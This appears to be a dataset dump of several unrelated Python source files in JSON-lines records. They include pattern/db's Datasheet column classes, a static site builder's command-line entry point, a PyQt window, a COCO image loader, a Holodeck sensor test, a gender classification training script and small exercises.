__setitem__(self, j, column):\n if self._datasheet.fields is not None and j < len(self._datasheet.fields):\n # Preserve the column header if it exists.\n f = self._datasheet.fields[j]\n else:\n f = None\n self.pop(j)\n self.insert(j, column, field=f)\n\n def __getitem__(self, j):\n if j < 0:\n j = j % len(self) # DatasheetColumns[-1]\n if j >= len(self):\n raise IndexError(\"list index out of range\")\n return self._cache.setdefault(j, DatasheetColumn(self._datasheet, j))\n\n def __getslice__(self, i, j):\n return self._datasheet[:, i:j]\n\n def __delitem__(self, j):\n self.pop(j)\n\n def __len__(self):\n return len(self._datasheet) > 0 and len(self._datasheet[0]) or 0\n\n def __iter__(self):\n for i in range(len(self)):\n yield self.__getitem__(i)\n\n def __repr__(self):\n return repr(list(iter(self)))\n\n def __add__(self, column):\n raise TypeError(\"unsupported operand type(s) for +: 'Datasheet.columns' and '%s'\" % column.__class__.__name__)\n\n def __iadd__(self, column):\n self.append(column)\n return 
self\n\n def __eq__(self, columns):\n return list(self) == columns\n\n def __ne__(self, columns):\n return not self.__eq__(self, columns)\n\n def insert(self, j, column, default=None, field=None):\n \"\"\" Inserts the given column into the matrix.\n Missing rows at the end (bottom) will be filled with the default value.\n \"\"\"\n try:\n column = [v for v in column]\n except:\n raise TypeError(\"Datasheet.columns.insert(x): x must be list\")\n column = column + [default] * (len(self._datasheet) - len(column))\n if len(column) > len(self._datasheet):\n self._datasheet.extend([[None]] * (len(column) - len(self._datasheet)))\n for i, row in enumerate(self._datasheet):\n row.insert(j, column[i])\n self._datasheet.__dict__[\"_m\"] += 1 # Increase column count.\n # Add a new header.\n if self._datasheet.fields is not None:\n self._datasheet.fields += [(None, None)] * (len(self) - len(self._datasheet.fields) - 1)\n self._datasheet.fields.insert(j, field or (None, None))\n\n def append(self, column, default=None, field=None):\n self.insert(len(self), column, default, field)\n\n def extend(self, columns, default=None, fields=[]):\n for j, column in enumerate(columns):\n self.insert(len(self), column, default, j < len(fields) and fields[j] or None)\n\n def remove(self, column):\n if isinstance(column, DatasheetColumn) and column._datasheet == self._datasheet:\n self.pop(column._j)\n return\n raise ValueError(\"list.remove(x): x not in list\")\n\n def pop(self, j):\n column = list(self[j]) # Return a list copy.\n for row in self._datasheet:\n row.pop(j)\n # At one point a DatasheetColumn object was created with Datasheet.columns[j].\n # It might still be in use somewhere, so we unlink it from the datasheet:\n self._cache[j]._datasheet = Datasheet(rows=[[v] for v in column])\n self._cache[j]._j = 0\n self._cache.pop(j)\n for k in range(j + 1, len(self) + 1):\n if k in self._cache:\n # Shift the DatasheetColumn objects on the right to the left.\n self._cache[k - 1] = self._cache.pop(k)\n self._cache[k - 1]._j = k - 1\n self._datasheet.__dict__[\"_m\"] -= 1 # Decrease column count.\n # Remove the header.\n if self._datasheet.fields is not None:\n self._datasheet.fields.pop(j)\n return column\n\n def count(self, column):\n return len([True for c in self if c == column])\n\n def index(self, column):\n if isinstance(column, DatasheetColumn) and column._datasheet == self._datasheet:\n return column._j\n return list(self).index(column)\n\n def sort(self, cmp=None, key=None, reverse=False, order=None):\n # This makes most sense if the order in which columns should appear is supplied.\n if order and reverse is True:\n o = list(reversed(order))\n if order and reverse is False:\n o = list(order)\n if not order:\n o = _order(self, cmp, key, reverse)\n for i, row in enumerate(self._datasheet):\n # The main difficulty is modifying each row in-place,\n # since other variables might be referring to it.\n r = list(row)\n [row.__setitem__(i2, r[i1]) for i2, i1 in enumerate(o)]\n # Reorder the datasheet headers.\n if self._datasheet.fields is not None:\n self._datasheet.fields = [self._datasheet.fields[i] for i in o]\n\n def swap(self, j1, j2):\n self[j1], self[j2] = self[j2], self[j1]\n # Reorder the datasheet headers.\n if self._datasheet.fields is not None:\n self._datasheet.fields[j1], self._datasheet.fields[j2] = (\n self._datasheet.fields[j2],\n self._datasheet.fields[j1])\n\n#--- DATASHEET COLUMN ------------------------------------------------------------------------------\n\n\nclass DatasheetColumn(list):\n\n 
def __init__(self, datasheet, j):\n \"\"\" A dynamic column in a Datasheet.\n If the actual column is deleted with Datasheet.columns.remove() or Datasheet.columms.pop(),\n the DatasheetColumn object will be orphaned (i.e., it is no longer part of the table).\n \"\"\"\n self._datasheet = datasheet\n self._j = j\n\n def __getslice__(self, i, j):\n return list(list.__getitem__(self._datasheet, i)[self._j] for i in range(i, min(j, len(self._datasheet))))\n\n def __getitem__(self, i):\n return list.__getitem__(self._datasheet, i)[self._j]\n\n def __setitem__(self, i, value):\n list.__getitem__(self._datasheet, i)[self._j] = value\n\n def __len__(self):\n return len(self._datasheet)\n\n def __iter__(self): # Can be put more simply but optimized for performance:\n for i in range(len(self)):\n yield list.__getitem__(self._datasheet, i)[self._j]\n\n def __reversed__(self):\n return reversed(list(iter(self)))\n\n def __repr__(self):\n return repr(list(iter(self)))\n\n def __gt__(self, column):\n return list(self) > list(column)\n\n def __lt__(self, column):\n return list(self) < list(column)\n\n def __ge__(self, column):\n return list(self) >= list(column)\n\n def __le__(self, column):\n return list(self) <= list(column)\n\n def __eq__(self, column):\n return list(self) == column\n\n def __ne__(self, column):\n return not self.__eq__(column)\n\n def __add__(self, column):\n return list(self) + list(column)\n\n def __iadd__(self, column):\n self.extend(column)\n\n def __contains__(self, value):\n for v in self:\n if v == value:\n return True\n return False\n\n def count(self, value):\n return len([True for v in self if v == value])\n\n def index(self, value):\n for i, v in enumerate(self):\n if v == value:\n return i\n raise ValueError(\"list.index(x): x not in list\")\n\n def remove(self, value):\n \"\"\" Removes the matrix row that has the given value in this column.\n \"\"\"\n for i, v in enumerate(self):\n if v == value:\n self._datasheet.pop(i)\n return\n raise ValueError(\"list.remove(x): x not in list\")\n\n def pop(self, i):\n \"\"\" Removes the entire row from the matrix and returns the value at the given index.\n \"\"\"\n row = self._datasheet.pop(i)\n return row[self._j]\n\n def sort(self, cmp=None, key=None, reverse=False):\n \"\"\" Sorts the rows in the matrix according to the values in this column,\n e.g. 
clicking ascending / descending on a column header in a datasheet viewer.\n \"\"\"\n o = order(list(self), cmp, key, reverse)\n # Modify the table in place, more than one variable may be referencing it:\n r = list(self._datasheet)\n [self._datasheet.__setitem__(i2, r[i1]) for i2, i1 in enumerate(o)]\n\n def insert(self, i, value, default=None):\n \"\"\" Inserts the given value in the column.\n This will create a new row in the matrix, where other columns are set to the default.\n \"\"\"\n self._datasheet.insert(i, [default] * self._j + [value] + [default] * (len(self._datasheet) - self._j - 1))\n\n def append(self, value, default=None):\n self.insert(len(self), value, default)\n\n def extend(self, values, default=None):\n for value in values:\n self.insert(len(self), value, default)\n\n def map(self, function=lambda value: value):\n \"\"\" Applies the given function to each value in the column.\n \"\"\"\n for j, value in enumerate(self):\n self[j] = function(value)\n\n def filter(self, function=lambda value: True):\n \"\"\" Removes the matrix rows for which function(value) in the column is not True.\n \"\"\"\n i = len(self)\n for v in reversed(self):\n i -= 1\n if not function(v):\n self._datasheet.pop(i)\n\n def swap(self, i1, i2):\n self._datasheet.swap(i1, i2)\n\n#---------------------------------------------------------------------------------------------------\n\n_UID = 0\n\n\ndef uid():\n global _UID\n _UID += 1\n return _UID\n\n\ndef truncate(string, length=100):\n \"\"\" Returns a (head, tail)-tuple, where the head string length is less than the given length.\n Preferably the string is split at a space, otherwise a hyphen (\"-\") is injected.\n \"\"\"\n if len(string) <= length:\n return string, \"\"\n n, words = 0, string.split(\" \")\n for i, w in enumerate(words):\n if n + len(w) > length:\n break\n n += len(w) + 1\n if i == 0 and len(w) > length:\n return (w[:length - 1] + \"-\",\n (w[length - 1:] + \" \" + \" \".join(words[1:])).strip())\n return (\" \".join(words[:i]),\n \" \".join(words[i:]))\n\n_truncate = truncate\n\n\ndef pprint(datasheet, truncate=40, padding=\" \", fill=\".\"):\n \"\"\" Prints a string where the rows in the datasheet are organized in outlined columns.\n \"\"\"\n # Calculate the width of each column, based on the longest field in each column.\n # Long fields can be split across different lines, so we need to check each line.\n w = [0 for column in datasheet.columns]\n R = []\n for i, row in enumerate(datasheet.rows):\n fields = []\n for j, v in enumerate(row):\n # Cast each field in the row to a string.\n # Strings that span beyond the maximum column width are wrapped.\n # Thus, each \"field\" in the row is a list of lines.\n lines = []\n if not isinstance(v, str):\n v = str(v)\n for v in v.splitlines():\n v = decode_utf8(v.strip())\n while v:\n head, v = _truncate(v, truncate)\n lines.append(head)\n w[j] = max(w[j], len(head))\n fields.append(lines)\n R.append(fields)\n for i, fields in enumerate(R):\n # Add empty lines to each field so they are of equal height.\n n = max([len(lines) for lines in fields])\n fields = [lines + [\"\"] * (n - len(lines)) for lines in fields]\n # Print the row line per line, justifying the fields with spaces.\n columns = []\n for k in range(n):\n for j, lines in enumerate(fields):\n s = lines[k]\n s += ((k == 0 or len(lines[k]) > 0) and fill or \" \") * (w[j] - len(lines[k]))\n s += padding\n columns.append(s)\n print(\" 
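# Aside: expected behaviour of truncate() above, which prefers to split at a
# space and injects a hyphen only when a single word exceeds the limit:
#     >>> truncate("the quick brown fox", length=9)
#     ('the quick', 'brown fox')
#     >>> truncate("antidisestablishmentarianism", length=10)[0]
#     'antidises-'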
\".join(columns))\n","sub_path":"pattern/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":46275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"119045600","text":"# coding=utf-8\nimport argparse\nimport logging\nimport sys\nimport time\n\nimport arrow\nfrom path import path\n\nfrom engineer.commands import all_commands, common_parser\nfrom engineer.log import get_console_handler, bootstrap\nfrom engineer.plugins import load_plugins\nfrom engineer import version\n\ntry:\n # noinspection PyPep8Naming\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n__author__ = 'Tyler Butler '\n\n\ndef get_argparser():\n # from engineer.commands.argh import PrintArghCommand\n desc = \"Engineer static site builder. [v%s, %s %s]\" % (version,\n version.date,\n time.strftime('%X',\n arrow.get(version.datetime).to(\n 'local').timetuple()))\n top_level_parser = argparse.ArgumentParser(prog='engineer',\n description=desc,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n subparsers = top_level_parser.add_subparsers(title=\"subcommands\",\n dest='parser_name')\n\n for command_class in all_commands():\n instance = command_class(subparsers, top_level_parser)\n instance.setup_command()\n\n return top_level_parser\n\n\ndef parse_override_args(extra_args):\n override = {}\n override_settings_indexes = [i for i, j in enumerate(extra_args) if j.startswith('--')]\n for index, item in enumerate(override_settings_indexes):\n v2 = override_settings_indexes[index + 1] if (index + 1) < len(override_settings_indexes) else len(extra_args)\n r = range(item + 1, v2)\n for _ in r:\n values = [extra_args[v] for v in r]\n if len(values) == 1:\n values = values[0]\n override[extra_args[item][2:].upper()] = values\n return override\n\n\ndef cmdline(args=sys.argv):\n # bootstrap logging\n bootstrap()\n\n # Load all plugins\n load_plugins()\n\n skip_settings = []\n args, extra_args = get_argparser().parse_known_args(args[1:])\n\n # Handle common parameters if they're present\n common_args, extra_args = common_parser.parse_known_args(extra_args)\n\n override = parse_override_args(extra_args)\n\n verbose = getattr(args, 'verbose', common_args.verbose)\n config_file = getattr(args, 'config_file', common_args.config_file)\n\n logger = logging.getLogger('engineer')\n if verbose >= 2:\n logger.removeHandler(get_console_handler(logging.WARNING))\n logger.addHandler(get_console_handler(logging.DEBUG))\n elif verbose == 1:\n logger.removeHandler(get_console_handler(logging.WARNING))\n logger.addHandler(get_console_handler(logging.INFO))\n else:\n pass # WARNING level is added by default in bootstrap method\n\n if args.parser_name in skip_settings or (hasattr(args, 'need_settings') and not args.need_settings):\n pass\n else: # try loading settings\n try:\n from engineer.conf import settings\n\n if config_file is None:\n default_settings_file = path.getcwd() / 'config.yaml'\n logger.info(\"No '--settings' parameter specified, defaulting to %s.\" % default_settings_file)\n settings.reload(default_settings_file, override)\n else:\n settings.reload(config_file, override)\n except Exception as e:\n logger.error(e.message)\n exit()\n\n # noinspection PyBroadException\n try:\n if hasattr(args, 'function'):\n args.function(args)\n elif hasattr(args, 'func'):\n args.func(args)\n elif hasattr(args, 'handler_function'):\n args.handler_function(args)\n else:\n args.handle(args)\n except Exception as e:\n logger.exception(\"Unexpected error: %s\" % 
e.message)\n\n exit()\n","sub_path":"engineer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369635912","text":"from PyQt4 import QtGui, QtCore, uic\nfrom pyqtgraph.dockarea import DockArea, Dock\nimport random\nfrom datetime import datetime\nimport os\nfrom widgets.ZMQSubscriber import ZMQSubscriber\n\nmain_package_dir = os.path.join(os.path.dirname(__file__), os.pardir)\nui_filename = os.path.join(main_package_dir, \"ui/MainWindow.ui\")\nUi_MainWindow, QMainWindow = uic.loadUiType(ui_filename)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n \"\"\"The only window of the application.\"\"\"\n\n def __init__(self, settings):\n super(MainWindow, self).__init__()\n self.settings = settings\n\n self.setupUi(self)\n\n self.dock_area = DockArea()\n self.setCentralWidget(self.dock_area)\n\n self.createDocks()\n\n self.loadSettings()\n\n def createDocks(self):\n self.zmq_subscriber = ZMQSubscriber(self.settings, self)\n self.zmq_subscriber_dock = Dock('Subscriber',\n widget=self.zmq_subscriber)\n self.dock_area.addDock(self.zmq_subscriber_dock)\n\n def loadSettings(self):\n \"\"\"Load window state from self.settings\"\"\"\n\n self.settings.beginGroup('mainwindow')\n geometry = self.settings.value('geometry').toByteArray()\n state = self.settings.value('windowstate').toByteArray()\n dock_string = str(self.settings.value('dockstate').toString())\n if dock_string is not \"\":\n dock_state = eval(dock_string)\n self.dock_area.restoreState(dock_state)\n self.settings.endGroup()\n\n self.restoreGeometry(geometry)\n self.restoreState(state)\n\n def saveSettings(self):\n \"\"\"Save window state to self.settings.\"\"\"\n self.settings.beginGroup('mainwindow')\n self.settings.setValue('geometry', self.saveGeometry())\n self.settings.setValue('windowstate', self.saveState())\n dock_state = self.dock_area.saveState()\n # dock_state returned here is a python dictionary. 
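# Aside: loadSettings()/saveSettings() round-trip the dock layout through
# repr()/eval(). A safer sketch of the same round trip uses ast.literal_eval,
# which only accepts Python literals instead of executing arbitrary code:
import ast

state = {'main': ('dock', 'Subscriber', {})}  # illustrative dock-state dict
encoded = repr(state)
assert ast.literal_eval(encoded) == state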
Couldn't find a good\n        # way to save dicts in QSettings, hence we just store its repr().\n        self.settings.setValue('dockstate', repr(dock_state))\n        self.settings.endGroup()\n\n    def closeEvent(self, event):\n        self.zmq_subscriber.saveSettings()\n        self.saveSettings()\n","sub_path":"streamlogger/widgets/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529015919","text":"\nimport os\nos.environ[\"THEANO_FLAGS\"] = \"mode=FAST_RUN,device=cpu,floatX=float32\"\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport theano\nimport PIL.Image as Image\nclass coco_loader(object):\n\n    def __init__(\n        self,\n        mscoco=\"C:/Users/user/project_dumesnil/\",\n        input=\"train2014\",\n        target=\"train2014\",\n        caption_path=\"C:/Users/user/project_dumesnil/dict_key_imgID_value_caps_train_and_valid.pkl\"\n    ):\n        # Parameters:\n        # mscoco: string coco folder\n        # split : string training folder\n        # caption_path: string caption path\n\n        print('Loading ' + input + ' data...')\n        self.mscoco = mscoco\n        self.input_path = os.path.join(mscoco, input)\n        self.input_imgs = glob.glob(self.input_path + \"/*.jpg\")\n        self.target_path = os.path.join(mscoco, target)\n        self.target_imgs = glob.glob(self.target_path + \"/*.jpg\")\n        caption_path = os.path.join(mscoco, caption_path)\n        with open(caption_path, 'rb') as fd:\n            caption_dict = pkl.load(fd)\n        self.caption_dict = caption_dict\n        self.x = np.array(0)\n        self.y = np.array(0)\n\n\n\n    def load_items(self, batch_idx, batch_size, depth_input, transpose_x=True, transpose_y=True):\n        batch_input_imgs = self.input_imgs[batch_idx*batch_size:(batch_idx+1)*batch_size]\n        batch_target_imgs = self.target_imgs[batch_idx*batch_size:(batch_idx+1)*batch_size]\n        res_input = [self.load_item(i, input_path, depth_input) for i, input_path in enumerate(batch_input_imgs)]\n        res_target = [self.load_item(i, target_path, 32) for i, target_path in enumerate(batch_target_imgs)]\n        # remove None entries and unzip the list\n        self.x, cap_x, cap_id_x = zip(*[x for x in res_input if x is not None])\n        self.y, cap_y, cap_id_y = zip(*[y for y in res_target if y is not None])\n        self.x = np.array(self.x)\n        self.y = np.array(self.y)\n        if(transpose_x):\n            self.x = self.x.transpose((0, 3, 1, 2))\n        if(transpose_y):\n            self.y = self.y.transpose((0, 3, 1, 2))\n        #return theano.shared(np.array(self.x), borrow = True), theano.shared(np.array(self.y), borrow = True), cap\n\n        return np.array(self.x), np.array(self.y), cap_x, cap_id_x\n\n\n\n    def load_item(self, index, img_path, depth_input):\n        img = Image.open(img_path)\n        img_array = np.array(img)\n        cap_id = os.path.basename(img_path)[:-4]\n\n        # create 32x32 black square in the middle of the image\n        center = (int(np.floor(img_array.shape[0] / 2.)), int(np.floor(img_array.shape[1] / 2.)))\n        if len(img_array.shape) == 3:\n            image = np.copy(img_array)\n            if depth_input < 32:\n                image[depth_input:64-depth_input, depth_input:64-depth_input, :] = 0\n        else:\n            # skip gray images\n            return None\n        # return the normalized values\n        return image.astype('float32')/255., self.caption_dict[cap_id], cap_id\n","sub_path":"coco_loader.py","file_name":"coco_loader.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"649625742","text":"listax = []\nwhile True:\n    n = int(input(\"Enter a number to add to list X (0 to quit): \"))\n    if n == 0:\n        break\n    
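# Aside: load_item() above blanks the centre of a 64x64 image by slicing. A tiny
# self-contained numpy sketch of that masking step; mask_center() is an
# illustrative name, not part of the original loader.
import numpy as np

def mask_center(img, border):
    """Zero the centre block of a 64x64xC array, leaving a border-pixel frame."""
    out = img.copy()
    out[border:64 - border, border:64 - border, :] = 0
    return out

img = np.ones((64, 64, 3), dtype='float32')
masked = mask_center(img, 16)
assert masked[32, 32, 0] == 0 and masked[0, 0, 0] == 1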
listax.append(n)\nlistay = []\nwhile True:\n    n = int(input(\"Enter a number to add to list Y (0 to quit): \"))\n    if n == 0:\n        break\n    listay.append(n)\nlistaz = listax[:]\nlistaz.extend(listay)\n\nx = 0\nwhile x < len(listaz):\n    print(\"({}) {}\".format(x, listaz[x]))\n    x += 1","sub_path":"cap06/ex-06-02.py","file_name":"ex-06-02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261561407","text":"import uuid\nimport copy\n\nimport holodeck\n\nconfigs = {\n    \"AndroidAgent\": {\n        \"name\": \"test_android_joint_sensor\",\n        \"world\": \"TestWorld\",\n        \"main_agent\": \"android0\",\n        \"agents\": [\n            {\n                \"agent_name\": \"android0\",\n                \"agent_type\": \"AndroidAgent\",\n                \"sensors\": [\n                    {\n                        \"sensor_type\": \"JointRotationSensor\",\n                    }\n                ],\n                \"control_scheme\": 1, # Max Torque control scheme\n                \"location\": [0, 0, 5]\n            }\n        ]\n    },\n\n    \"HandAgent\": {\n        \"name\": \"test_android_joint_sensor\",\n        \"world\": \"TestWorld\",\n        \"main_agent\": \"hand0\",\n        \"agents\": [\n            {\n                \"agent_name\": \"hand0\",\n                \"agent_type\": \"HandAgent\",\n                \"sensors\": [\n                    {\n                        \"sensor_type\": \"JointRotationSensor\",\n                    }\n                ],\n                \"control_scheme\": 1, # Max Torque control scheme, no floating\n                \"location\": [0, 0, 5]\n            }\n        ]\n    }\n}\n\n\ndef test_joint_rotation_sensor(joint_agent_type):\n    \"\"\"Iterates over every joint in the given joint list and validates that applying a\n    torque to that joint causes the values reported by the JointRotationSensor\n    to change.\n\n    Args:\n        joint_agent_type (tuple of agent type (str) and list of joint names):\n            Parameterized input\n\n    \"\"\"\n\n    agent_type, joints = joint_agent_type\n    zeroes = [0 for _ in range(len(joints))]\n\n    binary_path = holodeck.packagemanager.get_binary_path_for_package(\"DefaultWorlds\")\n\n    with holodeck.environments.HolodeckEnvironment(scenario=configs[agent_type],\n                                                   binary_path=binary_path,\n                                                   uuid=str(uuid.uuid4())) as env:\n        \n        # Let the Android collapse into a twitching mess on the ground\n        for _ in range(400):\n            env.tick()\n        \n        for i in range(len(joints)):\n            name = joints[i]\n\n            action = copy.deepcopy(zeroes)\n            action[i] = 1\n\n            # Sample the joint rotation before torquing it\n            pre_rotation = env.step(action)[0][\"JointRotationSensor\"][i]\n\n            # Torque it for a few ticks\n            for _ in range(10):\n                env.step(action)\n            \n            # Sample it\n            post_rotation_1 = env.step(action)[0][\"JointRotationSensor\"][i]\n\n            # Torque it in the opposite direction for a bit to make sure it wasn't\n            # maxed out in the positive direction before\n\n            action[i] = -1\n            for _ in range(10):\n                env.step(action)\n            \n            post_rotation_2 = env.step(action)[0][\"JointRotationSensor\"][i]\n\n            # print(\"{} {}/{}\".format(name, abs(pre_rotation - post_rotation_1), abs(pre_rotation - post_rotation_2)))\n\n            if \"foot\" in name:\n                # Ugly, disgusting hack. The foot joints behave strangely, I can't figure out why. 
Skip them for now\n # BYU-PCCL/holodeck#297\n continue\n\n # Make sure the rotation is different\n assert abs(pre_rotation - post_rotation_1) > 1e-3 or \\\n abs(pre_rotation - post_rotation_2) > 1e-3, \\\n \"The rotation for the joint {} (index {}) did not change enough!\"\\\n \"Before: {}, after positive max torque: {}, after negative max torque{}\"\\\n .format(joints[i], i, pre_rotation, post_rotation_1, post_rotation_2)\n \n # Let things settle\n for _ in range(10):\n env.tick()\n\n","sub_path":"tests/sensors/test_joint_rotation_sensor.py","file_name":"test_joint_rotation_sensor.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139160100","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport time, gc\nimport pandas as pd\nfrom lstm import train_and_test, preprocess, test\nimport numpy as np\nimport torch\nimport os\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\ndef main():\n print(\"Predict Youtube cross genre\")\n directory = 'data/csv/'\n '''df_data, y = preprocess_data(directory, 'train_news_twitter.csv')\n df_test, test_y = preprocess_data(directory, 'youtube_train.csv')\n train_and_test(df_data, y, df_test, test_y, 100, 'youtube')\n\n print(\"Predict News cross genre\")\n directory = 'data/csv/'\n df_data, y = preprocess_data(directory, 'train_youtube_twitter.csv')\n df_test, test_y = preprocess_data(directory, 'news_train.csv')\n train_and_test(df_data, y, df_test, test_y, 100, 'news')'''\n\n print(\"Predict Twitter cross genre\")\n #directory = 'data/csv/'\n #df_data, y = preprocess_data(directory, 'twitter_train.csv')\n #df_test, test_y = preprocess_data(directory, 'twitter_train.csv')\n #print(\"Shape of train and test: \", df_data.shape, df_test.shape)\n #train_and_test(df_data, y, df_test, test_y, 100, 'twitter')\n\n '''directory = 'data/csv/'\n df_data, y, df_test, test_y = preprocess_data(directory, 'surprise_test.csv', split=True)\n print(\"Shape of train and test: \", df_data.shape, df_test.shape)\n train_and_test(df_data, y, df_test, test_y, 100, 'surprise')'''\n\n #cross genre\n\n '''model = 'models/news_model_cg_0.557.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_cg_0.557.pk', 'rb'))\n corpus.batch_size = 16\n model.batch_size = 16\n df_test, test_y = preprocess_data(directory, 'twitter_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_twitter_2', test=False)\n\n model = 'models/news_model_cg_0.557.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_cg_0.557.pk', 'rb'))\n corpus.batch_size = 10\n model.batch_size = 10\n df_test, test_y = preprocess_data(directory, 'news_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_news_1', test=False)\n\n model = 'models/youtube_model_cg_0.558.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/youtube_corpus_cg_0.558.pk', 'rb'))\n corpus.batch_size = 2\n model.batch_size = 2\n df_test, test_y = preprocess_data(directory, 'youtube_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_youtube_1', test=False)'''\n\n '''model = 'models/news_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_in.pk', 'rb'))\n corpus.batch_size = 1\n model.batch_size = 1\n df_test, test_y = preprocess_data(directory, 'surprise_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_kb_1', test=False)'''\n\n 
#in_genre\n\n model = 'models/youtube_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/youtube_corpus_in.pk', 'rb'))\n corpus.batch_size = 2\n model.batch_size = 2\n df_test, test_y = preprocess_data(directory, 'youtube_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_youtube_1', test=False)\n\n '''model = 'models/news_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_in.pk', 'rb'))\n corpus.batch_size = 10\n model.batch_size = 10\n df_test, test_y = preprocess_data(directory, 'news_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_news_1', test=False)\n\n model = 'models/twitter_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/twitter_corpus_in.pk', 'rb'))\n corpus.batch_size = 16\n model.batch_size = 16\n df_test, test_y = preprocess_data(directory, 'twitter_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_twitter_1', test=False)'''\n\n\n\ndef preprocess_data(directory, input_file, delimiter=\"\\t\", predict=False, split=False):\n # uncomment this to read data from csv\n data_iterator = pd.read_csv(directory + input_file, encoding=\"utf-8\", delimiter=delimiter, chunksize=1000)\n df_data = pd.DataFrame()\n for sub_data in data_iterator:\n df_data = pd.concat([df_data, sub_data], axis=0)\n gc.collect()\n print(\"Data shape before preprocessing:\", df_data.shape)\n #df_data = df_data[:100]\n\n df_data = preprocess(df_data)\n df_data.to_csv(directory + \"data_preprocessed.csv\", encoding=\"utf8\", sep=\"\\t\", index=False)\n\n print(df_data.columns.tolist())\n\n # shuffle the corpus and optionaly choose the chunk you want to use if you don't want to use the whole thing - will be much faster\n df_data = df_data.sample(frac=1, random_state=1)\n\n print(\"Data shape: \", df_data.shape)\n\n if split:\n df_train, df_test = train_test_split(df_data, test_size=0.1)\n tags = df_train.gender\n m_data = df_train[df_train['gender'] == 'M']\n f_data = df_train[df_train['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_train = df_train.drop(['gender'], axis=1)\n y_train = np.array([0 if tmp_y=='M' else 1 for tmp_y in tags])\n\n tags = df_test.gender\n m_data = df_test[df_test['gender'] == 'M']\n f_data = df_test[df_test['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_test = df_test.drop(['gender'], axis=1)\n y_test = np.array([0 if tmp_y == 'M' else 1 for tmp_y in tags])\n\n print('All shape: ', df_train.shape, y_train.shape, df_test.shape, y_test.shape)\n\n return df_train, y_train, df_test, y_test\n\n\n\n else:\n if predict:\n tags = df_data.id\n else:\n tags = df_data.gender\n m_data = df_data[df_data['gender'] == 'M']\n f_data = df_data[df_data['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_data = df_data.drop(['gender'], axis=1)\n if not predict:\n y = np.array([0 if tmp_y=='M' else 1 for tmp_y in tags])\n else:\n y = np.array([tmp_y for tmp_y in tags])\n return df_data, y\n\n\nif __name__ == '__main__':\n start_time = time.time()\n # run from command line\n # e.g. 
python3 gender_classification.py --input './pan17-author-profiling-training-dataset-2017-03-10' --output results --language en\n argparser = argparse.ArgumentParser(description='Clin gender evaluation')\n argparser.add_argument('-c', '--input', dest='input', type=str,\n default='data/weebit',\n help='Choose input trainset')\n # args = argparser.parse_args()\n main()\n\n print(\"--- Model creation in minutes ---\", round(((time.time() - start_time) / 60), 2))\n print(\"--- Training & Testing in minutes ---\", round(((time.time() - start_time) / 60), 2))\n\n\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633728187","text":"age_1 = int(input('Cuantos años tienes?: '))\nage_2 = int(input('Cual es la edad de tu amigo?: '))\n\nif age_1 > age_2:\n diff = age_1 - age_2\n difw = str(diff)\n print('Eres mayor que tu amigo por ' + difw + ' años')\nelif age_1 < age_2:\n diff = age_2 - age_1\n difw = str(diff)\n print('Tu amigo es mayor por ' + difw + ' años')\nelse:\n print('Los dos tienen la misma edad')\n\n","sub_path":"py_basico/age_comparative.py","file_name":"age_comparative.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"185738270","text":"\"\"\"\n// Time Complexity : o(n)\n// Space Complexity : constant\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\n\n// Your code here along with comments explaining your approach\n\"\"\"\n\nclass Solution:\n def candy(self, ratings: List[int]) -> int: #2 pass algorithm, first we check going left to right and then right to left\n candies = [1] * len(ratings) #initially everyone has 1 candy\n \n for i in range(1,len(ratings)): #checking with previous values\n if ratings[i] > ratings[i-1]: #if rating for current is higher, increase the number of candies for current to prev candies + 1\n candies[i] = candies[i-1] + 1\n \n for i in range(len(ratings)-2, -1, -1): #2nd pass, \n if ratings[i] > ratings[i+1]:\n candies[i] = max(candies[i],candies[i+1] + 1) #check if current number of candies is already greater than the right neighbour, else increment by 1\n \n return sum(candies) #return sum \n \n \n 